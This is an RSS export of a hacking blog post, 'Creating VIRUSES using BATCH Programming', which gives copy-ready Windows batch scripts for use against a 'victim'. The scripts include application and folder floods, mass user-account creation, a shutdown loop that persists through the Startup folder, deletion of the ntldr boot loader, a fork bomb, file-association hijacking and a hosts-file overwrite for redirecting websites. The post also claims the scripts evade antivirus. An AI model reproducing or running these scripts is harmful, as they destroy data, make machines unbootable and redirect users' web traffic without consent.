<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-6760504672792288349</atom:id><lastBuildDate>Thu, 19 Dec 2024 03:24:14 +0000</lastBuildDate><category>Educational</category><category>Hacking</category><category>Windows</category><category>Download</category><category>Hackers</category><category>Android</category><category>Blogger</category><category>Internet</category><category>Mobile</category><category>Tricks</category><category>CEH v8</category><category>Back Track</category><category>Linux</category><category>Ethical Hacking</category><category>Scanning</category><category>Social Engineering</category><category>Footprinting</category><category>Apple</category><category>Hacking Web Applications</category><category>Hacking Webservers</category><category>Others News</category><category>SQL Injection</category><category>Ubuntu</category><category>Denial of Service</category><category>Hacking News</category><category>Hacking Wireless</category><category>Mobile Hacking</category><category>Penetration Testing</category><category>Session Hijacking</category><category>Sniffers</category><category>Trojans and Backdoors</category><category>Buffer Overflow</category><category>Cryptography</category><category>Enumeration</category><category>Evading IDS</category><category>Firewalls</category><category>Honeypots</category><category>Mac</category><category>Powerpoint Slides</category><category>Symbian</category><category>System Hacking</category><category>Viruses and Worms</category><category>Windows Mobie</category><title> Hack Hippo ! This Site is Only for Educational Purpose</title><description>This Site is Only for Educational Purpose</description><link>http://hackhippo.blogspot.com/</link><managingEditor>noreply@blogger.com (Sahil Rai)</managingEditor><generator>Blogger</generator><openSearch:totalResults>88</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>This Site is Only for Educational Purpose</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-7417491906542802290</guid><pubDate>Mon, 31 Mar 2014 07:39:00 +0000</pubDate><atom:updated>2014-03-31T01:26:27.107-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Hackers</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Trojans and Backdoors</category><title>Creating VIRUSES using BATCH Programming</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 12px;"&gt;Creating VIRUSES using BATCH Programming&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrAjl_hZFD09mXoDCXsmFo9rZrl6m9JYLLXN6yBz5UqENPrjpGeGi7WcMvzv_86n8dF6HHI5L3ym3y9QRhJ0klmJb5M_5ECOZTWS-HFdohmYiLXY5lgHht52Lg7Dzjs1SKJnXKvNm0vfC/s1600/computer-virus-vector-hackrhino.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrAjl_hZFD09mXoDCXsmFo9rZrl6m9JYLLXN6yBz5UqENPrjpGeGi7WcMvzv_86n8dF6HHI5L3ym3y9QRhJ0klmJb5M_5ECOZTWS-HFdohmYiLXY5lgHht52Lg7Dzjs1SKJnXKvNm0vfC/s1600/computer-virus-vector-hackrhino.jpg" height="200" width="190" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;/h2&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
Hai guys.. This is Prabhu. I just want to share something that i know about creatig VIRUS using BATCH FILES.  Batch files are type of executable files with the extention ".bat" . Coming to the point , we can create malicious and irritating virus just by typing their codes and saving them as .bat extension.&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="background-color: rgba(255, 255, 255, 0.498039); border-collapse: collapse; color: black; font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 1px auto; padding: 4px; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="border: 2px solid rgb(171, 171, 171); padding: 2px; vertical-align: top;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyWmSL3Bw9yTOyxIVawTUE6zIL08eHeaMyxPhN51uUeBrexXOvN9JeTS0ZeC2DTBOFFY5wIWdamSAiI5Go8nsu9JCLE1SE190Y0Q8tSWum9u965QHt5Sfpm6DrPhvBEKZk2-3kd6TOAw/s200/l%253B%2527.jpg" height="200" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto; margin: 10px; max-width: 200px; width: 200px;" width="200" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="border: 2px solid rgb(171, 171, 171); font-size: 10px; padding: 2px; vertical-align: top;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;I could just you give the  codes to paste  in notepad and  ask you to save files with extension .bat and your deadly batch viruses would be ready to attack. But &lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.blogger.com/null"&gt;&lt;/a&gt;instead of that, I have just focussed on making the basics of creating batch files clear and developing the approach to code your own viruses.So please just try to understand the code instead of copying it to notepad. &lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;ul style="list-style-type: none; margin: 1em 0px 1em 24px; padding: 0px;"&gt;
&lt;li style="color: #141414; margin: 0px; overflow-x: visible; overflow-y: hidden; padding: 0px 0px 0px 11px;"&gt;&lt;span class="apple-style-span" style="font-size: medium;"&gt;&lt;b&gt;What are Batch Files ?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;br /&gt;Lets start with a simple example , Open your command prompt(cmd) and change your current directory on to 'desktop' by typing 'cd desktop' without the quotes.&lt;br /&gt;&lt;br /&gt;Now type these commands in order &lt;br /&gt;&lt;br /&gt;1. md a  //makes directory 'a' on desktop&lt;br /&gt;2. cd a  // changes current directory to 'a'&lt;br /&gt;3. md b // makes a directory 'b' in directory 'b' &lt;br /&gt;We first make a folder/directory 'a', then enter in folder  'a',then make a folder 'b' in folder 'a' . &lt;br /&gt;Now delete the folder 'a'.&lt;br /&gt;Lets do the same thing in an other way. Type the same  three commands given above in the  notepad and save the file as anything.bat . You can give any name in place of 'anything'.       &lt;b style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-XZ6NSV7qF_8DgJRT4OcoYTTaiJB6hkHuSi4c7HtD2wNuYOcCPODDSF0-R9xKnss3SOlAaR0CfnKglZOORSYql8AohaoSasCkYy7iek4EdrXdA8MAMq83mLOXWBYyYSFoNqMmfnjmzA/s1600/batch.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-XZ6NSV7qF_8DgJRT4OcoYTTaiJB6hkHuSi4c7HtD2wNuYOcCPODDSF0-R9xKnss3SOlAaR0CfnKglZOORSYql8AohaoSasCkYy7iek4EdrXdA8MAMq83mLOXWBYyYSFoNqMmfnjmzA/s1600/batch.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/div&gt;
Now simply double click on this batch file and the same job will be done by the file created using notepad and by using command prompt(cmd) . You will get a folder with name 'a' on your desktop and another folder with name 'b' in it. This means the three commands are executed in order, when we ran the batch file &lt;br /&gt;&lt;br /&gt;So a batch file is nothing but  a text containing series of commands which are executed automatically line by line when the batch file is run. &lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;What can batch viruses do ?&lt;/span&gt;&lt;/b&gt;&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;ul style="list-style-type: none; margin: 1em 0px 1em 24px; padding: 0px;"&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPTNLkfrdaD2WrWCbQbkHoYWGCNcXjfwGQ4oLLX5CmgaUtu4WeExHzIKzTXDNDkFNLArI2HyX_DvAQiBrHXzJ1MS-26szbBGU2O2xbu9gR5ekODBcOKFFLtt8EzZal6gNVDDmduOJNLg/s1600/kop.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPTNLkfrdaD2WrWCbQbkHoYWGCNcXjfwGQ4oLLX5CmgaUtu4WeExHzIKzTXDNDkFNLArI2HyX_DvAQiBrHXzJ1MS-26szbBGU2O2xbu9gR5ekODBcOKFFLtt8EzZal6gNVDDmduOJNLg/s1600/kop.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.&lt;br /&gt;&lt;br /&gt;Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (here  anything means any name youwant to give to your file  but extension must be .bat and save it as 'all files' instead of text files).&lt;br /&gt;&lt;br /&gt;Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.&lt;br /&gt;&lt;br /&gt;1.  Application Bomber&lt;div&gt;
&lt;br /&gt;@echo off // It instructs to hide the commands when batch files is executed&lt;br /&gt;:x   //loop variable&lt;br /&gt;start winword&lt;br /&gt;start mspaint  //open paint&lt;br /&gt;start notepad&lt;br /&gt;start write&lt;br /&gt;start cmd //open command prompt&lt;br /&gt;start explorer&lt;br /&gt;start control&lt;br /&gt;start calc // open calculator&lt;br /&gt;goto x // infinite loop&lt;br /&gt;This code when executed will start  opening different applications present in the system like paint,notepad,command prompt repeatedly(because of infinite loop), irritating the victim and ofcourse affecting the performance.&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYxjB2w5Zc846MQYTec2nlmAASuv6ttLF-8KzRJP1EuuIjmCEYi4N9nMR09LbZitHVeBUKokWomRmQKvoYoxFtyHSIzQz7gFmQjGJvpKQhpW7LheS1_Bu5rXjuQomTFtLjwq6K01PLZA/s1600/cvdhn.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYxjB2w5Zc846MQYTec2nlmAASuv6ttLF-8KzRJP1EuuIjmCEYi4N9nMR09LbZitHVeBUKokWomRmQKvoYoxFtyHSIzQz7gFmQjGJvpKQhpW7LheS1_Bu5rXjuQomTFtLjwq6K01PLZA/s1600/cvdhn.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;2. Folder flooder&lt;br /&gt;@echo off&lt;br /&gt;:x&lt;br /&gt;md %random% // makes directory or folder. &lt;br /&gt;goto x&lt;br /&gt;Here %random% is a variable that would generate any positive number  randomly.  So this code will  start creating folders whose name can be any random number.&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-d45Yy73p_p7eXs6tycgK3upRhmjUMYZ9a05ntK7zFtkpN8qXf-BH5PdAWsUQICNFl9KRvqLu1g7kptlqv44x3y_xKHuDtqXXgWVixSrWj1loNJvejiXcqF-9dQvfVDTdUQGHrboAQ/s1600/jkk.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-d45Yy73p_p7eXs6tycgK3upRhmjUMYZ9a05ntK7zFtkpN8qXf-BH5PdAWsUQICNFl9KRvqLu1g7kptlqv44x3y_xKHuDtqXXgWVixSrWj1loNJvejiXcqF-9dQvfVDTdUQGHrboAQ/s1600/jkk.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
3.User account flooder &lt;br /&gt;@echo off&lt;br /&gt;:x&lt;br /&gt;net user %random% /add //create user account&lt;br /&gt;goto x&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;This code will start creating windows user accounts whose names could be any random numbers.&lt;/span&gt;&lt;/b&gt;&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; font-size: 11.818181991577148px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfhN98ALEPrC1Xf15jLeWBRsnopbfeKLVOnc3nekqyDk-LJHlJtlL-ssrc_S15ie52m40bWn08BeCtmurW2nn5AHzRGJD_WGGo25BaGrb3yLfxMnOJovLmUKTpXfjDgFr4C2e_Z-YgA/s1600/k%253Bk.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfhN98ALEPrC1Xf15jLeWBRsnopbfeKLVOnc3nekqyDk-LJHlJtlL-ssrc_S15ie52m40bWn08BeCtmurW2nn5AHzRGJD_WGGo25BaGrb3yLfxMnOJovLmUKTpXfjDgFr4C2e_Z-YgA/s1600/k%253Bk.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;3.Shutdown Virus&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  &lt;br /&gt;copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”    //these two commands will copy the batchfile in start up folders (in XP)&lt;br /&gt;shutdown -s -t 00  //this will shutdown the computer in 0 seconds  &lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbNV8j2mll-IbWs_TbgSYhAQoDF7rFWwH30BC19PGLVwfgRbFP_XgkoAYOlASheIR_dr9eBok4Wv10FPGipivahCCCGhDg-bltGpQvgfdnDi-A6T6AfDGQOLXGc4I80IHQAKDpcJiaA/s1600/ui.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbNV8j2mll-IbWs_TbgSYhAQoDF7rFWwH30BC19PGLVwfgRbFP_XgkoAYOlASheIR_dr9eBok4Wv10FPGipivahCCCGhDg-bltGpQvgfdnDi-A6T6AfDGQOLXGc4I80IHQAKDpcJiaA/s1600/ui.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
Everytime when the victim start's the computer, this batch file in start up will run and shutdown the computer immediately. You will be able to remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.&lt;br /&gt;&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;4. Deleting boot files&lt;br /&gt;Goto C drive in Win XP , Tools-&amp;gt;Folder Option-&amp;gt;View&lt;br /&gt;Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply &lt;br /&gt;Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows. &lt;br /&gt;Lets make a batch file to &lt;br /&gt;delete this file from victim's computer and the windows will not start then.&lt;br /&gt;attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively&lt;br /&gt;del ntldr    //delete ntldr file&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhHvNdvIIekoeesY4_Q48xJw3Srwf4KOM7F4p7yfTR5i_9xTti7UYuk02kjAbQw56k_4a2rO74o_T7u8OaUGz7tEQYIHHfIcVCd5HrexBGL-FbzqYgaV703Lgobcclc_ErZoESNuir0g/s1600/kjl.%253B.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhHvNdvIIekoeesY4_Q48xJw3Srwf4KOM7F4p7yfTR5i_9xTti7UYuk02kjAbQw56k_4a2rO74o_T7u8OaUGz7tEQYIHHfIcVCd5HrexBGL-FbzqYgaV703Lgobcclc_ErZoESNuir0g/s1600/kjl.%253B.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
After running this batch file , system will not reboot and a normal victim should definitely install the windows again use his computer. &lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;5. Fork Bomb&lt;br /&gt;%0|%0  //Its percentage zero pipe percentage zero&lt;br /&gt;This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_ESV5dBQIanQYvUcbuZogl_GBr0BLiNWHAdVdpk1P5KvxMEZ0wI8zzf1ntdDiWZZnKrEUTtGvVE09oIpDOOerHvQTooXtQXxgoFME654tNGspIW6IVkodfl7DeDqTY-Usj3lfb1AegA/s1600/hgjkl.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_ESV5dBQIanQYvUcbuZogl_GBr0BLiNWHAdVdpk1P5KvxMEZ0wI8zzf1ntdDiWZZnKrEUTtGvVE09oIpDOOerHvQTooXtQXxgoFME654tNGspIW6IVkodfl7DeDqTY-Usj3lfb1AegA/s1600/hgjkl.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;6. Extension Changer&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
@echo off&lt;br /&gt;assoc .txt=anything // this command associates extension .txt with filetype anything.&lt;br /&gt;assoc .exe=anything&lt;br /&gt;assoc .jpeg=anything&lt;br /&gt;assoc .png=anything&lt;br /&gt;assoc .mpeg=anything                          &lt;br /&gt;&lt;br /&gt;Every extension is associated with a filetype like extension ‘.exe’. It  is associated with filetype ‘exe file’. To know these, just type ‘assoc’ in command prompt.&lt;br /&gt;&lt;br /&gt;Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files will not be able to open properly.&lt;br /&gt;&lt;br /&gt;7.  DNS Poisoning&lt;br /&gt;There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.&lt;br /&gt;The code is:&lt;br /&gt;@echo off&lt;br /&gt;echo xxx.xxx.xxx.xxx www.anything.com &amp;gt; C:\windows\system32\drivers\etc\hosts   //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file. &lt;br /&gt;Replace xxx.xxx.xxx.xxx  and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKdF6RawNGmSERxu8c7uFjIsppNAzyltH9msM3o4-O6o1ynKSiXR5yq17JZVXiO3aUrgN8ZzTUJIn0_FlWR9a-WYn7TKPY-tw8mCPjnrQMjAsEquPOo2HFgBHwZgbREqHijF70xZKXgA/s1600/l%253Bk%253B%2527.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKdF6RawNGmSERxu8c7uFjIsppNAzyltH9msM3o4-O6o1ynKSiXR5yq17JZVXiO3aUrgN8ZzTUJIn0_FlWR9a-WYn7TKPY-tw8mCPjnrQMjAsEquPOo2HFgBHwZgbREqHijF70xZKXgA/s1600/l%253Bk%253B%2527.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
Note : Most of the batch viruses are simply undetectable by any anitiviruses&lt;br /&gt;Tip : Coding good viruses just depends on the DOS commands you know and logic you use.&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/div&gt;
